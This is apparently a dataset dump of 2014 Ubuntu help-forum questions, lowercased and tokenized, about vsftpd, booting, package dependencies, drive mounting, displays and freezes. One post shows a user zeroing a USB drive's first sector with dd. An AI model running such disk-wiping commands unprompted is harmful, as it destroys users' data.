522631	vsftpd - 500 illegal port command	distributor id : debian description : debian gnu/linux 7.6 ( wheezy ) release : 7.6 vsftpd : version 2.3.5 this is a new installation of vsftpd . i think i have the correct options in vsftpd.conf ; however , when i try to connect externally i get the following error when trying to list : 500 illegal port command . wed sep 10 21:37:47 2014 [ pid 2 ] connect : client `` < external ip > '' wed sep 10 21:37:47 2014 [ pid 2 ] ftp response : client `` < external ip > '' , `` 220 ( vsftpd 2.3.5 ) '' wed sep 10 21:37:49 2014 [ pid 2 ] ftp command : client `` < external ip > '' , `` user auser '' wed sep 10 21:37:49 2014 [ pid 2 ] [ auser ] ftp response : client `` < external ip > '' , `` 331 please specify the password . '' wed sep 10 21:37:53 2014 [ pid 2 ] [ auser ] ftp command : client `` < external ip > '' , `` pass < password > '' wed sep 10 21:37:53 2014 [ pid 1 ] [ auser ] ok login : client `` < external ip > '' wed sep 10 21:37:53 2014 [ pid 3 ] [ auser ] ftp response : client `` < external ip > '' , `` 230 login successful . '' wed sep 10 21:37:53 2014 [ pid 3 ] [ auser ] ftp command : client `` < external ip > '' , `` syst '' wed sep 10 21:37:53 2014 [ pid 3 ] [ auser ] ftp response : client `` < external ip > '' , `` 215 unix type : l8 '' wed sep 10 21:37:54 2014 [ pid 3 ] [ auser ] ftp command : client `` < external ip > '' , `` port 192,168,0,33,232,111 '' wed sep 10 21:37:54 2014 [ pid 3 ] [ auser ] ftp response : client `` < external ip > '' , `` 500 illegal port command . '' wed sep 10 21:37:55 2014 [ pid 3 ] [ auser ] ftp command : client `` < external ip > '' , `` quit '' wed sep 10 21:37:55 2014 [ pid 3 ] [ auser ] ftp response : client `` < external ip > '' , `` 221 goodbye . '' the fourth to the last line also has my internal ip address , not external . i believe that is the result of some sort of misconfiguration . i have my vsftpd.conf file up at pastebin . any help will be greatly appreciated . i 've been all over google trying everything i could find , eventually having to purge and try again after no change .
522632	booting linux from usb on a mac	i 'm only posting this question because it seems i 've been trying to get this to work for the last 2 weeks and feel like im exhausting my options . i 'm trying to build a persistent linux system ( blackbox ) on a usb flash drive . after multiple unsuccessful attempts with casper files and different partition schemas , i continue to get a 'no bootable device ' message after selecting the flash drive from refind . in my latest attempt , i ran the boot-repair tool to install grub in the efi partition . here is the result file http : //paste.ubuntu.com/8300147/ my partition table looks like this sdb1 - efi partition with grub installed sdb2 - blackbox linux sdb3 - data partition /home sdb4 - swap can anyone see what might be the problem from the boot-repair logs ? if i can provide any more useful information please let me know in the comments .
522635	reinstalling old computer and server for school lab	i newbe in linux . i has install edubuntu 12.04 in school lab in pc with intel i3 processor 250gb harddisk and 8 gb memory . other pc student spec is intel pentium 4 and memory 512mb . boot with pxe . because all that student pc has bad harddisk . this lab has 40 unit pc for student . the problem is if 15 or moore student pc used , the program is lag and no respon for long time , until i restart the pc server . i do n't know what is problem and what should i do ? is there any option or suggest to install other linux distro for server with that specipication and 40 client student pc . sorry if my english not verry good . thanks for all help .
522636	how to remove dependency problem ?	i 'm trying to install offline g++ software on ubuntu 14.04 : $ sudo dpkg -i g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb [ sudo ] password for ecil : dpkg : error processing archive g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb ecil @ ecil-hp : ~ $ sudo dpkg -r g++-4.4 ( reading database ... 164836 files and directories currently installed . ) removing g++-4.4 ( 4.4.3-4ubuntu5.1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... ecil @ ecil-hp : ~ $ sudo dpkg -i g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb ecil @ ecil-hp : ~ $ sudo dpkg -i g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb dpkg : error processing archive g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : g++-4.4.4_4.4.3-4ubuntu5.1_i386.deb ecil @ ecil-hp : ~ $ sudo dpkg -r g++-4.4 dpkg : warning : ignoring request to remove g++-4.4 which is n't installed ecil @ ecil-hp : ~ $ sudo dpkg -r g++-4.4 dpkg : warning : ignoring request to remove g++-4.4 which is n't installed ecil @ ecil-hp : ~ $ sudo dpkg -r g++-4.4 dpkg : warning : ignoring request to remove g++-4.4 which is n't installed ecil @ ecil-hp : ~ $ cd desktop/ ecil @ ecil-hp : ~/desktop $ sudo dpkg -i g++-3.3_3.3.5-13_i386.deb selecting previously unselected package g++-3.3 . ( reading database ... 164820 files and directories currently installed . ) preparing to unpack g++-3.3_3.3.5-13_i386.deb ... unpacking g++-3.3 ( 1:3.3.5-13 ) ... dpkg : dependency problems prevent configuration of g++-3.3 : g++-3.3 depends on gcc-3.3-base ( > = 1:3.3.5-13 ) ; however : package gcc-3.3-base is not installed . g++-3.3 depends on gcc-3.3 ( > = 1:3.3.5-13 ) ; however : package gcc-3.3 is not installed . g++-3.3 depends on gcc-3.3 ( < < 1:3.3.6 ) ; however : package gcc-3.3 is not installed . g++-3.3 depends on libstdc++5-3.3-dev ( > = 1:3.3.5-13 ) ; however : package libstdc++5-3.3-dev is not installed . dpkg : error processing package g++-3.3 ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : g++-3.3
522637	how might i force the desktop to load for a specific ( master/admin ) user ?	after noticing that /dev/sda7 was 100 % used , because transmission told me there was no space to do what i wanted to do , i deleted a number of files from my downloads folder , and shut down my computer . the next time i started up , i entered my password at the login screen , as i always do , and instead of loading the desktop , only a blue screen loaded . it appeared as if more might eventually load -- maybe it just takes more time because of this directory that 's 100 % full . i wandered away for about 15 mins . while waiting for the desktop to load , and when i returned , the desktop was still plain blue , without any menu , dock , icons , or toolbar . interestingly , i am able to login to the same partition , as a guest user . how might i log into the admin . account , and force the desktop to load properly ? failing that , is there a way to sign in as guest , and then access and edit files found in /dev/sda7 ? thank you .
522638	my usb drive not detected after removing it without unmount	i have written some files to my usb drive , then i removed it from my laptop without un-mounting it ( ejecting it ) from nautilus . now i plugged it in and ubuntu does not detect it at all . gparted does not detect it , too . result for : $ lsusb bus 002 device 006 : id 058f:1234 alcor micro corp . flash drive bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0bda:0139 realtek semiconductor corp. rts5139 card reader controller bus 001 device 004 : id 058f : a014 alcor micro corp. asus integrated webcam bus 001 device 006 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub when i remove it and performed the same command , this line disappeared bus 002 device 006 : id 058f:1234 alcor micro corp . flash drive so i did the following command and copied information for the above line only : result for : $ lsusb -v bus 002 device 006 : id 058f:1234 alcor micro corp . flash drive device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x058f alcor micro corp. idproduct 0x1234 flash drive bcddevice 0.01 imanufacturer 1 alcor micro iproduct 2 mass storage device iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0000 ( bus powered ) result for command : $ sudo fdisk -l disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0008f190 device boot start end blocks id system /dev/sda1 1242261504 1250263039 4000768 82 linux swap / solaris /dev/sda2 * 2048 1242261503 621129728 83 linux partition table entries are not in disk order i tried the following command , but i got `` no medium found '' $ sudo dd if=/dev/zero of=/dev/sdc bs=512 count=1 dd : failed to open ‘/dev/sdc’ : no medium found here is a screenshot of disks app : ( the last one disappears if i removed the usb drive , but i can only do the following : 'power off ' and 'edit mount options ' )
522639	how to mount encrypted directory after upgrade	i recently upgraded my ubuntu 12.04 to 14.04 . i chose the option that saves the files but only upgrades the systems files . after the upgrade the disk space still shows the percentage used , which means the data was not erased . however when i go to computer/home/ i see the previous 12.04 folder ( with old username ) and the current updated 14.04 folder ( with new username ) when i access the old folder , there is an icon ( access your private data.desktop ) that i could double click and a read me file with instructions on how to mount the directory . although when i do nothing happens nor is any folder mounted . i have tried browsing the folder and accessing the 'access your pprivate data.desktop ' icon through sudo nautilus . i also run the sudo ecryptfs-recover-private after a few prompts , this was the output ; inserted auth tok with sig [ 3b0b09e5e5418b4d ] into the user session keyring fopen : no such file or directory does anyone know how to go about this ? thanks
522640	how to make /bin/ps , called with aux as its argument , write to a file ?	is there a command line argument i can pass to /bin/ps -aux to make it write its output to a file ? edit : to resimulate my issue : open firefox enable developer preferences ( or as shortcut install addon devprefs ) open scratchpad by press shift + f4 in menu bar to go `` browser '' menu and click on `` environment '' now in scratchpad code paste this code , this code will find ps and then run it with command line options of aux and > path_to_desktop_me.txt var thiswin = services.ww.activewindow ; var env = cc [ ' @ mozilla.org/process/environment ; 1 ' ] .getservice ( ci.nsienvironment ) ; var pscommand = 'ps ' ; var paths = env.get ( 'path ' ) .split ( ' : ' ) ; var len = paths.length ; for ( var i = 0 ; i < len ; i++ ) { try { var fullyqualified = new fileutils.file ( os.path.join ( paths [ i ] , pscommand ) ) ; console.log ( 'fullyqualified : ' , fullyqualified.path ) if ( fullyqualified.exists ( ) ) { var ps = fullyqualified ; break ; } } catch ( e ) { // keep checking path if we run into ns_error_file_unrecognized_path } } if ( ! ps ) { console.error ( `` error : a task list executable not found on filesystem '' ) ; thiswin.alert ( 'error : a task list executable not found on filesystem ' ) ; throw new error ( `` error : a task list executable not found on filesystem '' ) ; } thiswin.alert ( 'path to ps : `` ' + ps.path + ' '' ' ) ; var process = cc [ ' @ mozilla.org/process/util ; 1 ' ] .createinstance ( ci.nsiprocess ) ; process.init ( ps ) ; var procfinned = { observe : function ( asubject , atopic , adata ) { thiswin.alert ( 'ps completed ' ) ; } } ; var filepathtooutputto = os.path.join ( os.constants.path.desktopdir , 'me.txt ' ) ; thiswin.alert ( 'will write to file path : `` ' + filepathtooutputto + ' '' ' ) ; var args = [ 'aux ' , ' > ' + filepathtooutputto ] ; var a = process.runasync ( args , args.length , procfinned ) ; then press ctrl + r to run the code , or can do same from going to `` execute '' menu and clicking `` run '' . so the code launches ps process with is right here : var args = [ 'aux ' , ' > ' + filepathtooutputto ] ; var a = process.runasync ( args , args.length , procfinned ) ; combinations tried : with quotes : var args = [ 'aux ' , ' > '' ' + filepathtooutputto + ' '' ' ] ; as one array entryvalue with quotes var args = [ 'aux > '' ' + filepathtooutputto + ' '' ' ] ; as one array entry with no quotes : var args = [ 'aux > ' + filepathtooutputto + '' ] ;
522641	gedit crashes due to highlight mode	i recently started to have a problem with gedit in ubuntu . if i try to open a file where the metadata selects a highlight mode , it crashes . i can open files in plain text , but if i try to select a highlight mode it crashes . when i start gedit with a plain text file , it complains about this : gedit : [ ... ] /tecplot2014/bin/libz.so.1 : no version information available ( required by /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 ) gedit : [ ... ] /tecplot2014/bin/libz.so.1 : no version information available ( required by /usr/lib/x86_64-linux-gnu/libxml2.so.2 ) if i start it with a file with the metadata selecting a highlight mode , it crases with the previous warnings plus : gedit : symbol lookup error : /usr/lib/x86_64-linux-gnu/libxml2.so.2 : undefined symbol : gzopen64 i 've been researching a bit but i could n't find anything that directly applies to this problem ( or at least my limited knowledge does not allow me to see any relation with other submitted questions ) . i 'd be very glad if someone could give me a hint .
522647	how to force 'top ' to show human readable values for % mem res and virt	how can i configure 'top ' to show all values in human readable format instead of long numerics . i am using ubuntu 14.04 . sample output i am getting at the moment : top - 11:39:56 up 14:46 , 11 users , load average : 1.14 , 1.61 , 1.35 tasks : 248 total , 2 running , 246 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 3.5 us , 1.4 sy , 0.1 ni , 93.3 id , 1.2 wa , 0.5 hi , 0.0 si , 0.0 st kib mem : 8040568 total , 7814164 used , 226404 free , 155912 buffers kib swap : 8249340 total , 208240 used , 8041100 free . 4688852 cached mem pid user pr ni virt res shr s % cpu % mem time+ command 7106 pavan 20 0 1439336 58244 17120 s 2.7 0.7 11:12.32 compiz 19358 pavan 20 0 685616 27460 11568 s 2.7 0.3 0:52.53 gnome-terminal 1011 root 20 0 328568 37232 22796 s 2.0 0.5 5:30.76 xorg 8879 pavan 20 0 895572 144464 13112 s 2.0 1.8 2:42.05 chrome 7135 pavan 20 0 422640 8956 6436 s 1.7 0.1 4:38.53 indicator-multi 8842 pavan 20 0 1113460 62956 14084 s 1.3 0.8 5:20.84 chrome 6879 pavan 20 0 524448 45100 10440 s 1.0 0.6 3:18.77 unity-panel-ser 8060 pavan 20 0 1107068 171568 52644 s 1.0 2.1 13:41.37 chrome
522648	can not reach detect display button	i 'm new to ubuntu , i just installed it on my pc and with installation it showing me big controls and behaving like i have a big screen when actually j have 15.6 , so i entered to a settings/display to change resolutions , and i can not to change resolution because i have only one option with built-in screen , i tried to reach the button detect display but i could n't reach it because small size of my screen , so anyone can tell me how i can reach this button without using mouse or generally change screen resolution with some another method .
522652	how to install ubuntu server 14.04 on lvm raid ?	i want to try install ubuntu on lvm raid logical volume , but fail on step grub installation . there are my steps as below : 1. use three hdds called sda , sdb , and sdc to create a volume group . 2. ctrl+alt+f2 switch to cmdline and create a raid5 logical volume to be `` / '' . lvcreate -- type raid5 -i 2 -l 500g -n lv vg 3. create a logical volume 32g as swap . lvcreate -l 32g -n lv_swap vg 4. install grub on /dev/sda , but failed . error msg : executing 'grub-install /dev/sda ' failed . this is a fatal error . i also tried to have one partition on each disk , and do the same procedures but still failed . though installation interface does not support creating lvm raid lv , i am not sure if it is allowed in installation . does someone have any idea to use lvm raid in os installation ? maybe using md raid to be lvm volume is a easy way to avoid this situation , but i still want to know if lvm raid could be used during installation process or not .
522656	how do i save a file with hide x ?	i 'm running ubuntu 14.04 , and hide x 0.3 . i 've setup the library , and configured the database . how can i save a file to it ? i tried using : hidex write +source= '' /home/myusername/file.zip '' +wam=yes +destination= '' /home/myusername/file.zip '' i just got error014291 , error1 , hidex can not complete the request . i 've never used hide x before so do n't assume i know anything . : p
522657	how do i completely remove avast antivirus on ubuntu	at first i did n't have antivirus on my ubuntu 14.04 , but a day later my friend sent a email about the antivirus that works on ubuntu . `` avast '' he say , therefore i immediately installed it . after seeing the results , i was not so happy . i thinks was not as good in windows . i decided to remove it , but i dont know how ? how to remove it ? edit using terminal to install it : wget http : //files.avast.com/files/linux/avast4workstation_1.0.6-2_i386.deb sudo dpkg -i avast4workstation_1.0.6-2_i386.deb ( thanks to rinzwind for suggestion )
522658	some serious issues with ubuntu on gpt uefi laptop ?	ok , i 've spent the last 10 hours learning all that i could about installing and partitioning , yet i have been unable to solve the problem . the caveat is that i know now a lot about linux installation . please bear with me , this post might be a little long but i want to be clear what i 've already tried . lets start from the beginning : i have a dell inspiron i3531-1200bk , a cheap laptop from amazon that i wanted to dualboot ubuntu and windows 8.1 . the laptop is gpt with uefi and secureboot enabled . i disabled fast start up and the liveusb boots up fine : although the screen flickers which may be a clue to my problems . i have many partitions for windows 8.1 . for ubuntu , /home is at sda9 , swap is on sda8 , and / is on sda7 . so , i installed ubuntu and did n't really test it . finally , i noticed that the brightness keys did not work . i followed this link 's advice : http : //itsfoss.com/fix-brightness-ubuntu-1310/ and also changed the grub to add acpi_backlight=vendor . for the record , the command ls /sys/class/backlight shows : acpi_video0 intel_backlight after rebooting , i was getting black screens or the right-half of the screen was purple while the left side showed the desktop . i played around with changing grub w/ changing 20-intel.conf and vice versa . eventually , i was left with a black screen after logging in . there , i noticed that i ca n't even access the virtual consoles tty1-7 , i used ctrlaltf1-7 and nothing . for some reason only f4 worked and then i was stuck in it . i got mad and hit some keys and fn+super+f7 got me back to the gui ( before logging in with the black screen ) . interesting thing to mention , the key for f2 for instance is internet , when i press ctrlaltf2 , internet is disconnected . i have never had virtual consoles not work with any distribution of linux ever . so i am really confused . i reinstalled ubuntu twice and same problem . wiped ubuntu and deleted the grub . from there , i tried manjaro and that was probably 1000x worse . x server failed to load , grub would n't start , etc . some of the problems were very similar ( with black screens and flickering ) . so i assume it has something to do with drivers . previously ubuntu shared the same efi partition as the windows bootloader and i used grub . right now , windows is the only os on my computer . i am using ubuntu live usb and all the problems are there . the confusing output to ps a is : pid tty stat time command 1566 tty4 ss 0:00 /bin/login -f 1570 tty5 ss 0:00 /bin/login -f 1591 tty2 ss 0:00 /bin/login -f 1598 tty3 ss 0:00 /bin/login -f 1620 tty6 ss 0:00 /bin/login -f 1810 tty4 s+ 0:00 -bash 1854 tty2 s+ 0:00 -bash 1865 tty5 s+ 0:00 -bash 1912 tty3 s+ 0:00 -bash 1957 tty6 s+ 0:00 -bash 1995 tty1 ss 0:00 /bin/login -f 2003 tty7 ssl+ 0:16 /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightd 2093 tty1 s+ 0:00 -bash 3979 pts/3 ss 0:00 bash 4048 pts/3 r+ 0:00 ps a
522659	unmet dependencies when installing apache2-prefork-dev	i m trying following command : sudo apt-get install apache2-prefork-dev and getting this error : the following packages have unmet dependencies : apache2-prefork-dev : depends : libaprutil1-dev but it is not going to be installed e : broken packages
522662	how do i add a new file to hide x 's library ?	i 'm running ubuntu 14.04 , and hide x 0.3 . i 've setup the library , and configured the database . i already asked a different question about saving a file with hide x , but i want to learn how to do some other basic things like this too . i could n't find any mention of doing this in the man , but i assume it can be done ?
522665	how do i mount a windows partition on an emmc drive ?	i have ubuntu installed on an asus t100 transformer in dual-boot mode with windows 8.1 . the parted command shows the windows os partition ( drive c : ) and a separate data partition ( numbers 4 and 5 as shown below ) . both of these are formatted as ntfs ; however , parted does n't seem to know this as it leaves the file system type blank ( but shows an `` msftdata '' flag - whatever that indicates ) . model : generic sd/mmc storage card ( sd/mmc ) disk /dev/mmcblk0boot1 : 4194kb sector size ( logical/physical ) : 512b/512b partition table : unknown disk flags : model : mmc hcg8e # ( sd/mmc ) disk /dev/mmcblk0 : 62.5gb sector size ( logical/physical ) : 512b/512b partition table : gpt disk flags : number start end size file system name flags 1 1049kb 106mb 105mb fat32 efi system partition boot , esp 2 106mb 1050mb 944mb ntfs basic data partition hidden , diag 3 1050mb 1184mb 134mb microsoft reserved partition msftres 4 1184mb 34.9gb 33.7gb basic data partition msftdata 7 34.9gb 45.4gb 10.5gb ext4 5 45.4gb 54.0gb 8589mb basic data partition msftdata 6 54.0gb 62.5gb 8590mb ntfs basic data partition hidden , diag a simple mount command using `` -t ntfs '' does n't work , so how do i ( can i ) mount these partitions in linux ? interestingly , the restore and recovery partitions ( numbers 2 and 6 ) are noted as being `` ntfs '' and both are mounted automatically .
522667	difference between system monitor and free -h	i have a lenovo t430 laptop with 3.7gb of ram . since i started using this machine i observe the following strange behavior . if i do a lot of things , say have rails server running , a few nodejs processes , spotify , skype , but especially important - a lot of open tabs in chrome , the system gets really sluggish . however in system monitor i see two things under memory and swap history : used memory is never more then 2.8 - 3gb out of 3.7 ; the swap is about 1.5-2 gb out of 4 gb ; so i am asking myself the following questions : why would the machine use the swap before the used ram reaches something like 3.5 or 3.6 out of 3.7 ? why would it swap so early ? if there is about 1gb of free ram , why does it become sluggish ? today i noticed something interesting though - right now system monitor shows 1.9gb of 3.7gb used memory , but the tool free -h shows the following stats : total used free shared buffers cached mem : 3,7g 2,7g 967m 420m 8,9m 830m -/+ buffers/cache : 1,9g 1,8g swap : 3,8g 0b 3,8g so how comes there is this big difference of 1.9gb in system monitor vs 2.7gb in free -h. this leads me to the following conclusion - system monitor does not show all of the used memory , so apparently i run out of memory sooner than i see in system monitor , which explains the `` early '' usage of swap and the sluggishness of my computer . am i correct ? p.s . i 've set the swappiness to 10 , but that does n't help a lot .
522669	can not ping external addresses	i 'm installing ubuntu 14.0.4 , i have edited my /etc/network/interfaces added a route with : up route add -net 10.x.x.x netmask 255.255.255.0 gw 10.x.x.1 my /etc/hosts and then when i open up my /etc/resolv.conf the system has picked up the right dns servers . i do the dig google.com the answer section has all the addresses for google . $ ping -c3 google.com ping google.com ( 41.191.219.56 ) 56 ( 84 ) bytes of data . 3 packets transmitted , 0 received , 100 % loss . my mind tells me it can resolve but it can not go out . despite all this , apt-get can work very fine , so i do n't think it might be the firewall . i have n't installed any gui , i suspect it will still not work on the browser . i 'm clueless either way .
522671	how can i take a textbox text entry and make it a variable ?	i am having trouble with python and would like to have some help . i am making a apt gui 'front-end ' with a nice ui . def on_textbox_changed ( self ) : self.instvar = self.installapps.get_text ( ) def on_button1_clicked ( self , widget ) : print `` preparing to run 'sudo apt-get install ( package selected ) '' command2 = 'xterm -e sudo apt-get install ' and self.instvar cmd2 = commands.getoutput ( command2 ) would you know how to take a textbox entry and make it a variable ? i looked around the web and this is what i came up with . and every time i 'm trying this it gives me this error : traceback ( most recent call last ) : file `` /home/rareshn/documents/zintori/applets/aptfe/aptfe/aptfewindow.py '' , line 49 , in on_button1_clicked command2 = 'xterm -e sudo apt-get install ' and self.instvar attributeerror : 'aptfewindow ' object has no attribute 'instvar' if you could help me , that would be useful . thanks !
522676	when sharing network connection , unable to access internet	when i share network connection through wifi , after while im unable to access internet . from quest and also from host . reconnection of internet connection in host solve problem for a while ( 2-15 ) min . this problem is continuing on host even after access point is shutdown until restart . edit : i have clonned mac and mi network requires registration of devices by max , is it possible problem ?
522680	ubuntu 14.04 randomly freezes ( drm )	this random freeze has been happening for months now . i believe the problem is in the direct rendering manager ( drm ) . from kernel log : dalius @ pc1124 : ~ $ cat /var/log/kern.log | grep drm sep 8 17:23:44 pc1124 kernel : [ 25.515278 ] [ drm ] initialized drm 1.1.0 20060810 sep 8 17:23:44 pc1124 kernel : [ 26.027712 ] [ drm ] memory usable by graphics device = 2048m sep 8 17:23:44 pc1124 kernel : [ 26.027719 ] fb : conflicting fb hw usage inteldrmfb vs vesa vga - removing generic driver sep 8 17:23:44 pc1124 kernel : [ 26.072105 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . sep 8 17:23:44 pc1124 kernel : [ 26.072108 ] [ drm ] driver supports precise vblank timestamp query . sep 8 17:23:45 pc1124 kernel : [ 26.190925 ] fbcon : inteldrmfb ( fb0 ) is primary device sep 8 17:23:45 pc1124 kernel : [ 26.265140 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device sep 8 17:23:45 pc1124 kernel : [ 26.265742 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 sep 8 18:21:25 pc1124 kernel : [ 3497.804013 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... render ring idle sep 9 09:12:37 pc1124 kernel : [ 36.280400 ] [ drm ] initialized drm 1.1.0 20060810 sep 9 09:12:37 pc1124 kernel : [ 36.535447 ] [ drm ] memory usable by graphics device = 2048m sep 9 09:12:37 pc1124 kernel : [ 36.535454 ] fb : conflicting fb hw usage inteldrmfb vs vesa vga - removing generic driver sep 9 09:12:37 pc1124 kernel : [ 36.592545 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . sep 9 09:12:37 pc1124 kernel : [ 36.592547 ] [ drm ] driver supports precise vblank timestamp query . sep 9 09:12:37 pc1124 kernel : [ 36.711561 ] fbcon : inteldrmfb ( fb0 ) is primary device sep 9 09:12:37 pc1124 kernel : [ 36.789513 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device sep 9 09:12:37 pc1124 kernel : [ 36.791186 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 sep 10 09:11:10 pc1124 kernel : [ 35.714929 ] [ drm ] initialized drm 1.1.0 20060810 sep 10 09:11:10 pc1124 kernel : [ 35.887189 ] [ drm ] memory usable by graphics device = 2048m sep 10 09:11:10 pc1124 kernel : [ 35.887199 ] fb : conflicting fb hw usage inteldrmfb vs vesa vga - removing generic driver sep 10 09:11:10 pc1124 kernel : [ 35.932129 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . sep 10 09:11:10 pc1124 kernel : [ 35.932131 ] [ drm ] driver supports precise vblank timestamp query . sep 10 09:11:10 pc1124 kernel : [ 36.060649 ] fbcon : inteldrmfb ( fb0 ) is primary device sep 10 09:11:10 pc1124 kernel : [ 36.137382 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device sep 10 09:11:10 pc1124 kernel : [ 36.147893 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 sep 11 08:34:45 pc1124 kernel : [ 84264.804020 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... render ring idle sep 11 09:07:46 pc1124 kernel : [ 24.695604 ] [ drm ] initialized drm 1.1.0 20060810 sep 11 09:07:47 pc1124 kernel : [ 25.412141 ] [ drm ] memory usable by graphics device = 2048m sep 11 09:07:47 pc1124 kernel : [ 25.412150 ] fb : conflicting fb hw usage inteldrmfb vs vesa vga - removing generic driver sep 11 09:07:47 pc1124 kernel : [ 25.456089 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . sep 11 09:07:47 pc1124 kernel : [ 25.456092 ] [ drm ] driver supports precise vblank timestamp query . sep 11 09:07:47 pc1124 kernel : [ 25.574852 ] fbcon : inteldrmfb ( fb0 ) is primary device sep 11 09:07:47 pc1124 kernel : [ 25.649351 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device sep 11 09:07:47 pc1124 kernel : [ 25.649523 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 the freeze happens on these : dalius @ pc1124 : ~ $ cat /var/log/kern.log | grep drm | grep hang sep 8 18:21:25 pc1124 kernel : [ 3497.804013 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... render ring idle sep 11 08:34:45 pc1124 kernel : [ 84264.804020 ] [ drm : i915_hangcheck_elapsed ] *error* hangcheck timer elapsed ... render ring idle after this , i ca n't switch to tty1-tty6 . i mostly see frozen login screen , but this has happened during normal usage ( mostly while using alt+tab ) . only solution is to hard reboot . i 've found out about reisub and will try it next time this happens . asus p5g41t-m lx2/gb ( integrated intel gma x4500 graphics ) intel ( r ) celeron ( r ) cpu e3400 full hw info : http : //pastebin.com/jsuvy8cu any suggestions on how to resolve/further debug this issue appreciated .
522682	can not get a 2160p ( 4k ) display to work	i have a lenovo x1 carbon laptop , and an external display ( philips 288p6 ) attached to the displayport of it . the monitor can do 3840x2160 resolution , as demonstrated by the windows 8.1 that ships with the laptop , but when i boot into a lubuntu live system , i get presented with a paltry 1920x1080 desktop . preferences - > monitor settings does not show me any larger resolutions for the external display , so i figured i had to use xrandr and help myself . here is what i 've tried : $ cvt 3840 2160 60 # 3840x2160 59.98 hz ( cvt 8.29m9 ) hsync : 134.18 khz ; pclk : 712.75 mhz modeline `` 3840x2160_60.00 '' 712.75 3840 4160 4576 5312 2160 2163 2168 2237 -hsync +vsync $ xrandr -- newmode `` 3840x2160_60.00 '' 712.75 3840 4160 4576 5312 2160 2163 2168 2237 -hsync +vsync $ xrandr -- addmode dp2 `` 3840x2160_60.00 '' $ xrandr -- verbose -- output dp2 -- mode `` 3840x2160_60.00 '' screen 0 : 3840x2160 1016x571 mm 96.00dpi crtc 1 : 3840x2160_60.00 60.0 +0+0 `` dp2 '' xrandr : configure crtc 1 failed crtc 0 : disable crtc 1 : disable crtc 2 : disable crtc 3 : disable screen 0 : revert crtc 0 : revert crtc 1 : revert crtc 2 : revert crtc 3 : revert that error message does not tell me much , i 'm afraid . and this is -- verbose ! in the interest of getting the most helop i can , let me add some logfile output : xorg.0.log : http : //hastebin.com/unuvocacul.log and then there is this at the end of dmesg|tail : [ 926.163974 ] drm : not enough stolen space for compressed buffer ( need 33177600 more bytes ) , disabling . hint : you may be able to increase stolen memory size in the bios to avoid this .
522685	language deutsch ( schweiz ) as sprache	the language installed is deutsch ( deutschland ) and the regional language is deutsch ( schweiz ) . i want to have as language deutsch ( schweiz ) , but i do not succeed to get it . when i choose as language deutsch i always get deutsch ( deutschland ) . please help .
522686	how do i use the fingerprint sensor for lenovo b40-70 laptops ?	does anyone know how to use the fingerprint scanner for ubuntu 12.04 . my laptop is lenovo b40-70 thank you
522688	backuppc : backup the localhost	i have succesfully installed backuppc on my ubuntu server , but i wonder how i can save the backup files on a remote server . i want to create a backup of localhost and the send it to a remote host ( not to `` /var/lib/backuppc/pc/localhost/ '' ) . is this possible ?
